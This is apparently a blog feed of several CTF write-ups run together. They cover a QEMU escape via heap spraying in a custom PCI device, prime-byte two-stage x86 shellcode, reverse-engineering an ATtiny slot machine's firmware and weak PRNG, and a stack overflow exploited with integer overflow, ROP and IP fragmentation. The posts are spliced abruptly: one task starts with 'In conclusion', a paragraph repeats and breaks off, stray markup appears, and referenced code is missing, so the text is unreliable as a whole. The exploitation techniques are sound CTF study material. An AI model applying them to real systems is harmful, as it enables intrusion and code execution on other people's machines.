You're dropped into a Linux virtual machine with root privileges, and your objective is to escape from the VM to read the flag on the host filesystem. Task description mentions some custom PCI device.

This virtual device's implementation has heap overflow vulnerability allowing read-write out-of-bounds access and UAF vulnerability. Although this is more than enough to leverage well-known heap exploitation techniques, due to my inadequate pwn skills, I decided to resort to heap spraying instead.

Reverse engineering

You're given an archive containing custom qemu-system-x86_64 binary along with some less interesting files like the kernel, initramfs image, bios-256k.bin and so on.

Nothing is known about this virtual PCI device at this point: no drivers, no documentation. The only option is to reverse-engineer its implementation. Although the binary is rather large (because it's a patched QEMU), finding the device wasn't too hard.

The device itself is really simple. It allocates so-called MMIO region in the RAM. Unlike ordinary RAM, memory accesses in MMIO range are intercepted by the device, and can cause side-effects. For example, if device in question was a serial port, read from certain location (so-called register) could pop next value from the input queue, and write could push given value into the output queue. Some other register may contain bitmask that describes current state of the devices: output queue full, input queue non-empty, current speed, and so on. Both real hardware devices and devices emulated by hypervisors are usually interacted with this way.

There're several bugs in there. First, you can access (both read and write) offsets from -32768 to 32767 from the allocated buffer regardless of its actual size. Second, you can use buffers after free.

Additionally, the binary also includes unreferenced function that calls system("cat flag"). So if we took control of the program counter (RIP), we can just jump there.

Exploitation

Although PCI devices are usually interacted with using kernel modules, Linux also provides a way to do so from userspace (provided you have root). The interface is described in Documentation/filesystems/sysfs-pci.txt.

In short, you need to open file /sys/devices/pci0000:00/0000:00:04.0/resource0 (numbers may obviously vary), mmap it into memory and access required offsets.

Since the initramfs contains very few binaries (basically, only busybox), exploit has to be written in C, compiled on some other machine into a statically linked binary, and then transferred to the VM (uuencode/uudecode is my tool of the choice for these kind of tasks).

Although vulnerabilities present were enough to gain RCE using well known heap exploitation techniques, I wasn't feeling confident enough to do so properly. I decided to play the dirty way.

The heap where overflow occurs is actually heap of QEMU itself. It has to contain some useful structures that can be overwritten, right?

Hoping that it would contain some function pointers, I scanned the heap for all values that looked like pointers into .text section of QEMU binary, and replaced all of them with address of aforementioned system("cat flag") gadget.

Unfortunately, these pointers were never called, and I got stuck for several hours.

My thought process was as follows. Assuming there're actually live pointers (as opposed to remainings of already freed memory), in order to increase the chances that they will be called, guest operating system has to ask the hypervisor or its virtual devices to do something. The more intricate, the better. There were very few of the devices available, and poking them would require to write some "drivers" for them, which would be rather troublesome.

Suddenly, an idea popped into my mind. ACPI is a known clusterfuck of weird shit. Attempting to suspend the machine will surely do something interesting. Suspend has to put all the devices to some sleep state, maybe even reset some of them, and so on.

And it actually did the trick. Attempting to suspend the guest operating system after running heap spraying exploit gives the flag (and then crashes the hypervisor :)).

In conclusion, the binary is pretty simple: it executes the passed shellcode at the known address but all bytes should be prime numbers.

Creating shellcode

Prime bytes definitely add a challenging part to the task. Since we have RWX memory at known address, the good approach will be to try to make two-stage shellcode: the first stage will be "prime" and will write a normal shellcode (second stage) to known address and then run it. That way we only need to make a write-what-where primitive in prime bytes.

Let's take a look at the x86_64 opcode table to see what instructions we can use. I used this table and an assembler to check my assumptions. After that, the following table was born:

First of all, we see useful operations like add eax, imm32, and eax, imm32, xor eax, imm32, etc. Using and we can zero the EAX in two ops: and eax, 0x02020202; and eax, 0x05050505. After that there are several ways to get any number in EAX. I proceeded with opcode xor because it occured that you can take 3 prime bytes, xor them and get any byte in range [0-255].

Okay, we can get any number in EAX, but what registers can we move that number to? We have no mov r, r opcode but we have xchg eax, ebp and xchg eax, edi.

Note: we also have mov edi, imm32 opcode but it limits us to prime-bytes values of EDI.

Now we can set EAX, EBP and EDI to arbitrary values. What if we already can do something like mov r/m, r? We have this opcode in our list, 89. After a bit of poking it occures that mov dword ptr [rdi], eax assembles to 89 07 that are prime bytes. Looks like we have our desired write-what-where primitive.

The scheme is:

set addr in EAX

move EAX to EDI

set value in EAX

move EAX to [RDI]

Note: we have a lot of "set number in EAX" operations, each one takes 2 ANDs to zero the EAX and then 3 XORs to make a number. To get rid of ANDs we track EAX value through the process of building the shellcode, then we can XOR EAX with any number, so we XOR it with N ^ EAX to get N in EAX.

From that point we simply take some shellcode, for example, shellcraft.sh() from pwntools, write it DWORD by DWORD to our memory after the first stage, and pass the control. Since we do not have a NOP, we can use some other harmless one-byte instruction to fill the rest of memory like xchg edi, eax (97). Victory!

How NOT to create the shellcode

Here I'll explain the more complicated solution I came up with on the CTF.

After finding a way to set up arbitrary values in EAX, EDI and EBP I just started to search randomly for other useful unstructions to proceed with and that's how I found the mov dword ptr [rdi], ebx. Somehow I didn't try to change EBX to EAX but proceeded with EBX version. But it gives us a problem: we don't have the control over the EBX register... or do we?

We have mov dword ptr [rdi], ebx, and we have mov r/m, r and mov r, r/m instructions in general, that means, we have mov ebx, dword ptr [rdi]. We also have add r, r/m. These two instructions give us the following scheme: search for different numbers in the binary itself (since we know base address), place one in the EBX, then add other numbers until we get the needed one. For these purposes I take first 0xA70 bytes from binary. There we can find numbers like that: ['0x0', '0x1', '0x2', '0x3', '0x4', '0x5', ..., '0xe28', '0x1b90', '0x441f', '0x8be8', '0xb807', '0xb81b', '0xc308', '0xc3f3', '0xfffc', '0x10001', '0x10102', '0x1be00', '0x20000', ..., '0xf66c35d', '0xf66f4ff', '0x1000be00', '0x10070190', '0x100e4100', '0x100e4200', '0x100e4218', '0x10615567', '0x14ff41ff', '0x19e8c789', '0x1f0fc35d', '0x2008f315', '0x2009ce05', '0x20297525', ..., '0xffffffb0', '0xffffffc0', '0xffffffd0', '0xffffffe0']. There are numbers almost similar to powers of 2, we need only ~log(N) additions to produce number N with them.

The other problem is how to efficiently find the optimal set of numbers whose sum gives the needed one. I believe that this problem somehow relates to subset sum problem and so is NP-complete. I use a greedy approach that takes maximum number that does not exceeds our goal, then keeps adding the largest possible numbers until we get the needed one. One step of algorithm is to take a number from priority queue, try to add each number from the binary, store sums that are less then the goal in priority queue. It seems that this algorithm gives a suboptimal result in constant time (constant since we have the same set of numbers and I make constant number of steps, 1000). For example, for the number 0xCAFEBABE we get the following set of numbers to sum up: (3351726080, 50087367, 3670080, 131074, 65794, 7056, 3624, 504, 3).

To recap, we use the following algorithm:

Set up address of zero in EDI

Move [RDI] to EBX

Set up address of the addition term in EDI

Add [RDI] to EBX

Repeat steps 3 and 4 if necessary

Profit

The write-what-where then looks like this:

Set up value in EBX

Set up address in EDI

Move EBX to [RDI]

Now we can use this primitive as described in previous part "Creating shellcode". The source code can be found here.

That's all!

]]>

"slot machine" was a hardware task in the reverse-engineering category on Google CTF Finals 2017, which took place in Zurich back in October 2017.

All teams got the same ATtiny-based slot machine game, which contained 2 stub flags. The objective was to reverse-engineer it by disassembling it (in

"slot machine" was a hardware task in the reverse-engineering category on Google CTF Finals 2017, which took place in Zurich back in October 2017.

All teams got the same ATtiny-based slot machine game, which contained 2 stub flags. The objective was to reverse-engineer it by disassembling it (in literal real-life sense) and dumping the firmware, figure out how flags can be obtained without access to the circuit, and do that with the machine at the organizers' table, which contained the real flags.

USBasp programmer means that we're probably going to deal with AVR family microcontroller. For instance, popular Arduino Uno is based on AVR microcontroller.

The programmer has the ability to download the firmware (unless it was read-protected through so-called fuse bits), so that's probably exactly what we're going to do.

Let's inspect the game first.

The slot machine has an LCD screen, like those commonly used in various DIY Arduino projects, and can be found cheaply on AliExpress.

Out of 10 buttons, only 2 from the upper row appear functional and, according to the schematics, the lower row is not connected at all. Pressing the leftmost button cyclically changes the current bet from 1 to 5. Pressing the second button plays the game. At the start of the game, you have 100 credits.

The game works like a typical slot machine. At the center of the screen, there are three reels, which display random symbols each time game is played: nothing, "bar", lemon, and "7". Having three matching symbols in a row will give you some credits based on your bet.

However, at that point, the conditions to get the flags were not yet known.

So, without much hesitation, I disassembled the slot machine. What was inside is a printed circuit board with ATtiny88 microcontroller.

ATtiny is one of the less powerful microcontrollers in AVR family. Although all AVR microcontrollers share the same basic instruction set (there are some instruction extensions, though), they have different set of integrated peripherals, like timers, IO ports, SPI interfaces, and so on.

The programmer uses simple protocol called ISP (in-system programming) over Serial Peripheral Interface to talk to the microcontroller.

In order to figure out how to connect the programmer to the MCU, we need to consult with the datasheet.

Reverse-engineering

Processor selection

AVR processors are relatively well-supported by IDA disassembler. Although there's no Hexrays decompiler support, disassembler works mostly fine, but there are still some annoying problems.

One the of the major obstacles is CPU selection dialog.

Although all processors in the AVR family have the same basic instruction set, as it has been mentioned above, they have different set of integrated peripherals and amount of available memory.

Selecting device with mismatching memory size will result in either truncated code section or buggy data section references (or both).

The set of peripherals affects two twings: IO registers and interrupt vectors.

The registers tend to occupy the same location across all AVR family. That is, locations corresponding to missing peripheral will be described as "reserved" in the datasheet, and remaining registers will be "fragmented" instead of "compacted".

However, interrupt vector layouts are very different. There are no unused vector numbers (which is likely caused by the fact that it would waste precious flash memory otherwise). For example, compare interrupt vectors on ATtiny88 and ATmega328p.

It wouldn't be much of a problem if IDA actually had definitions for all the AVR processors. Unfortunately, as you can see on the screenshot, it isn't the case. So the best option seems to select the best matching processor (which one is the best matching is also not obvious), and fix incorrect things (like interrupt names) by hand, consulting with the processor reference manual.

.data section

Another problem lies in how .data section is initialized.

To understand the problem, let's first discuss C and compilers in general.

.data section is where initialized data in your program goes to. In C, that would be all non-zero initialized variables with static lifetime (i.e. global variables and static variables inside functions). There's also .rodata section for things like string constants (AFAIK there's no memory protection in AVR, so there's no dedicated .rodata either).

How do these variables get from the executable file to the RAM?

On typical desktop Linux, this is handled by the ELF parser with the aid of MMU: ELF parser maps the corresponding regions of the ELF file with copy-on-write access rights. This operation is transparent, and the description of the .data region - where it lies in the binary and where it should be mapped - can be easily parsed from the ELF file.

There comes a little caveat. There's usually no ELF parser in embedded devices. And no MMU, either. There's just a blob of code in the flash storage, where the only thing you know for certain is entry point address.

How is .data section handled in this case?

In the avr-libc (which is a commonly used C library for AVR), there's a small piece of code that's executed right after reset, just before calling user's main function.

What this code does is it copies initial values for .data section from the persistent flash memory to RAM. These initial values are stored simply appended at the end of .text (code) section.

AVR cannot execute code from RAM at all. It's a Harvard architecture processor (purists will still find a couple of places where it deviates from pure Harvard architecture, though).

Flash memory can be read-accessed using special lpm instruction. Besides .data initialization, it's often for string constants and various tables, because there's much more flash memory available than RAM on (probably) all AVR devices. There are even special versions of typical libc functions that operate on data located in the program memory instead of RAM: pgmspace.h, snprintf_P. Unlike program counter, lpm instruction is byte-addressable.

Flash memory can also be programmed by the MCU itself using spm instructions. It's often used by bootloaders, like the one flashed on Arduino Uno that programs sketches received via serial interface from the USB chip. It's completely irrelevant for our discussion here, but I think it's worth mentioning.

Since all registers are 8 bit in size, but memory address width is 16-bit, register pairs are used to access arbitrary memory addresses. They are X (r26-r27), Y (r28-r29) and Z (r30-r31).

Actual reverse-engineering

Of course, I'm unable to reproduce the exact sequence of actions I did to figure out the program flow. Neither would it be practical due to rather chaotic nature of reverse-engineering process.

However, one of the first things I noticed certainly was the flag strings:

RAM:01A7 {FLAG_II}
RAM:01B1 {FLAG_I}

We can start from there.

Here comes another problem with IDA and AVR assembly. AVR is 8-bit processor having (up to) 16-bit addresses. So when constant address is passed to the function, it's stored in register pair using two load instructions. IDA can't recognize this pattern, and cross-references for data don't work as is.

I had to resort to searching for individual bytes of the addresses using "Search -> immediate value...".

There were two fragments of the code mentioning addresses of the two flags:

The second part of the task is pretty much the reenactment of that story.

Although the initial state of PRNG seems to be truly random, the PRNG itself is rather weak. It's just linear congruential generator with 32 bits of state, driven by equation state = state * 0x41C64E6D + 31337.

Even though I couldn't trace the exact code path that leads to the second flag, intuition once again suggested that in order to obtain the second flag, triple "7" must be rolled.

rand() function is called 9 times per every game, once for each symbol on the screen. Symbols are determined in column-major order, that is, the left reel comes first (from top to bottom), then the middle reel, and finally the right reel.

Each symbol has some fixed probability. It can be expressed as the following pseudo-code:

It leads to the following idea: play a couple of games, take notice of which symbols are rolled, then brute-force the internal state of the generator. Although the brute-force will be probabilistic, the longer the sequence is, the higher chance there is only one such initial state. In practice, playing 5 games is more than enough to reliably find the state value.

With current internal state known, it's now easy to find the number that must be added to the current state in order to get the state where triple "7" will be rolled immediately.

Brute-force program and most of the PRNG reverse-engineering work was done by my teammate vient.

This task is a remote x86_64 binary (both binary and libc were provided), tagged as "pwn" and "network". The goal is to exploit some vulnerability to gain remote code execution.

There are two parts of the task, named 2manypkts-v1 and 2manypkts-v2 respectively. We only managed to solve the first part, and submitted the flag literally at the last minute. So this write-up is about the first part only.

The binary has a simple stack buffer overflow vulnerability. You can overflow the buffer up to (and beyond) main return address, and employ well-known ROP technique.

Why the task was tagged "network" as well, you might ask? The problem is that the buffer is rather large, about 57 kilobytes. The data is read into the buffer by means of invoking read system call once, without any looping. Since read tends to return data to the user space as soon as it arrives, without waiting for the kernel buffer to fill up, getting it to overflow 57 kilobytes proved to be rather challenging.

Binary exploitation

The service employs simple text-based protocol, which is common for exploitation CTF tasks.

It greets the user with phrase "Welcome to the data eater".

Basically, all the service does is accept some data and prints it back.

You can enter data of one of the following types: "double", "int", "char", "long", "unsigned long". The service accepts data in binary format, and prints it back in proper text format.

First of all, to check that the number is not too big, the following condition is evaluated: nelems < 14336, where nelems is a signed integer. Any negative number passes this check.

This sounds like immediate win. Due to how negative numbers are represented in binary, and that read's count argument is unsigned size_t, negative nelems becomes very large unsigned value.

read system call doesn't check that entire range from buf to buf + count is mapped before starting to read data. Which means you can supply count much larger than actually mapped in memory, and just give the program whatever amount of bytes you want. More than that, attempt to write to unmapped memory doesn't even crash the program, it only causes read to return EFAULT error code as soon as unmapped page is encountered.

However, there's a small caveat. read has some sanity checks that cause EFAULT error to be returned immediately if address range is obviously invalid. Namely, if it overlaps with kernel space. As a side note, passing -1 when some binary is running on 32-bit ABI on 64-bit kernel actually works, as adding 2**32-1 is not enough to get to the kernel space, which is still 64-bit.

Okay, we can't just give the program some negative integer. Let's look further.

Secondly, the number is suspectible to integer overflow. Remember that in the read system call argument, nelems is actually multiplied by sizeof(T)? If nelems is exactly INT_MIN+1, and, say, we're dealing with 4-byte integers, nelems * 4 will overflow and become just 4. Likewise, INT_MIN+100000 becomes 400000 after multiplication.

Do you see where it's going? We can bypass first check with negative number, and use integer overflow to ensure that the resulting number of bytes is not too big, but large enough to cause buffer overflow. Win!

The next steps are rather obvious. I decided to use two ROP chains. The first would leak contents of some GOT entry, which would defeat libc ASLR, and them jump back to main. The second ROP chain will simply call system("/bin/sh"), which offsets would be known at this point.

Networking part

But note that our payload has to be at least 14336*sizeof(int) = 57344 bytes long (plus some small ROP chain payload).

When run over network, read tends to return much smaller chunks of data, not causing much desired overflow. This is a well known behaviour of Linux network stack.

Although I didn't investigate how exactly the kernel behaves, quick experiments have shown that typical amounts of data received were up to 7 kilobytes, and also multiplies of 1448, which is consistent with typical MTU values. So although the kernel seems to buffer received data a bit, it's not enough for us.

The hint provided by the CTF organizers suggested to mess with MTU and fragmentation.

IPv4 supports fragmentation. When IP packet is larger than MTU, it is broken into fragments, which are transmitted over network, and reassembled again at the destination host.

TCP implementations avoid IP fragmentation, if possible. One of the reasons why it's undesired is that loss of single IP fragment cause entire packet to be lost. Instead, TCP handles data "fragmentation" itself.

Transmission Control Protocol accepts data from a data stream, divides it into chunks, and adds a TCP header creating a TCP segment. The TCP segment is then encapsulated into an Internet Protocol (IP) datagram, and exchanged with peers. (Wikipedia)

It also allows operating system to return chunks of data to user program as segments arrive, which is something that interferes with our exploitation.

But what if we instead force the TCP/IP stack to create enourmous segments that will be fragmented on the lower layer? Network stack will wait for all IP fragments to arrive before passing data to the upper TCP layer.

Although you might argue that it eliminates only one place where data might be split into several chunks, in practice, it will reliably ensure that all data is returned at once.

Now the question is, how to make our TCP/IP stack to behave that way?

After some fruitless attempts of modifying interface MTU (which didn't have much effect on segment size), we decided to find a userspace TCP/IP stack that we can easily modify.

It includes a tool named tun_tcp_connect, which can be thought of as some kind of modified netcat.

In order to not interfere with OS own network stack (which might send RST in reply to unexpected packets), this tool uses a TUN device. What happens is it opens a TUN device, crafts network packets and sends them into the TUN device. The operating system will see some packets appearing on TUN interface, originating from virtual remote host (which is actually tun_tcp_connect program).

In our case, we need to setup up the TUN device as connected to some local network, and instruct tun_tcp_connect to assume the role of some host in that network. Then we create some typical NAT and routing rules that will cause these packets to be forwarded to the global internet.

Networking (revisited)

On the CTF, the exploit worked almost on the first try. The only problem I had was the stateful connection tracking rule.

However, when I revisited my solution to write this article, I encountered some major problems. During the game, I used my Android phone's Wi-Fi-tethered LTE connection.

This time, I tried to run the exploit from my home broadband connection. And it just didn't work. I also tried to run it from my university, and it didn't work either.

After some tcpdump investigation I concluded that large fragmented packets simply never reached the destination host. Connection was established just fine, small segments passed back and forth, but large segments didn't. tun_tcp_connect retransmitted these segments with no success.

Although I couldn't draw a definite conclusion why exactly packets didn't make it, I still made some observations.

My home connection seems to be allergic to large IP packets, not even large ICMP echo packets worked. Which is actually strange, as I have "white" (globally addressable) IPv4 address directly on the interface. Perhaps, traffic is passed through some DPI filters, which may defensively drop suspicious traffic.

In the university network, however, big ping payloads worked fine. I have no explanation why large TCP segments were dropped, and ICMP were not.

Only when I connected to the internet through my phone, recreating the same environment I used on the CTF (though it's now different phone with newer Android version), the exploit worked like a charm. In this scenario, LTE turned out to be better than both home broadband and university internet connection, which is really ironic.

By pure chance we had decided to relocate from university (which closes for the night) to nearby 24h diner instead of going home. Had we done otherwise, we might've been failed to solve this task.